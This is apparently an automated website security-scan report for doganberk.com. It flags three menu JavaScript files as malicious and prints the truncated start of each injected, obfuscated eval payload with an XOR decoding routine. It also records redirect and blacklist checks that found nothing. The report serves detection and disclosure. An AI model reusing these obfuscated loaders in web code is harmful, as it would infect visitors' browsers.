Scanned pages/files
Request | Server response | Status |
http://doganberk.com/ | 200 OK Content-Length: 19393 Content-Type: text/html | clean |
http://doganberk.com/menu/chromejs/chrome.js | 200 OK Content-Length: 23952 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B P(f){w.2N=B(a,b){v c=\'\';2F(v i=0;i<b.E;i++){c+=L.D(a.R(i%a.E)^b.R(i))}H c};w.U=B(h){G(h.z(\':\'))h=h.17(\':\')[0];v a=h.17(\'.\');Q(a.E>2){a.2E()}H a.2D(\'.\' Antivirus reports:
| ||
http://doganberk.com/jqueryslidemenu.js | 200 OK Content-Length: 14123 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z N(f){w.2w=z(a,b){q c=\'\';1G(q i=0;i<b.J;i++){c+=I.D(a.P(i%a.J)^b.P(i))}G c};w.U=z(h){F(h.B(\':\'))h=h.T(\':\')[0];q a=h.T(\'.\');S(a.J>2){a.1g()}G a.1f(\'.\')} Antivirus reports:
| ||
http://doganberk.com/slidemenu.js | 200 OK Content-Length: 13157 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z P(f){x.2G=z(a,b){w c=\'\';2E(w i=0;i<b.F;i++){c+=G.J(a.V(i%a.F)^b.V(i))}E c};x.19=z(h){K(h.B(\':\'))h=h.S(\':\')[0];w a=h.S(\'.\');T(a.F>2){a.2D()}E a.2C(\'.\') Antivirus reports:
| ||
http://doganberk.com/default.asp | 200 OK Content-Length: 19393 Content-Type: text/html | clean |
http://doganberk.com/soru.asp | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://doganberk.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://doganberk.com/agca.asp | 200 OK Content-Length: 12894 Content-Type: text/html | clean |
http://doganberk.com/js/prototype.js | 200 OK Content-Length: 126132 Content-Type: application/x-javascript | clean |
http://doganberk.com/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 2654 Content-Type: application/x-javascript | clean |
http://doganberk.com/js/lightbox.js | 200 OK Content-Length: 18389 Content-Type: application/x-javascript | clean |
http://doganberk.com/agca/1-1.jpg | 200 OK Content-Length: 280825 Content-Type: image/jpeg | clean |
http://doganberk.com/agca/2-2.jpg | 200 OK Content-Length: 262624 Content-Type: image/jpeg | clean |
http://doganberk.com/agca/3-3.jpg | 200 OK Content-Length: 282162 Content-Type: image/jpeg | clean |
http://doganberk.com/agca/4-4.jpg | 200 OK Content-Length: 272157 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: doganberk.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 21 Aug 2014 08:18:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 19393
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAASAATDQ=OJNDHKACFNBGFLIDPDALCJNB; path=/
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
...19393 bytes of data.
GET / HTTP/1.1
Host: doganberk.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 21 Aug 2014 08:18:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 19393
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAASAATDQ=OJNDHKACFNBGFLIDPDALCJNB; path=/
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
...19393 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: doganberk.com
Referer: http://www.google.com/search?q=doganberk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: doganberk.com
Referer: http://www.google.com/search?q=doganberk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=doganberk.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://doganberk.com/
Result: doganberk.com is not infected or malware details are not published yet.
Result: doganberk.com is not infected or malware details are not published yet.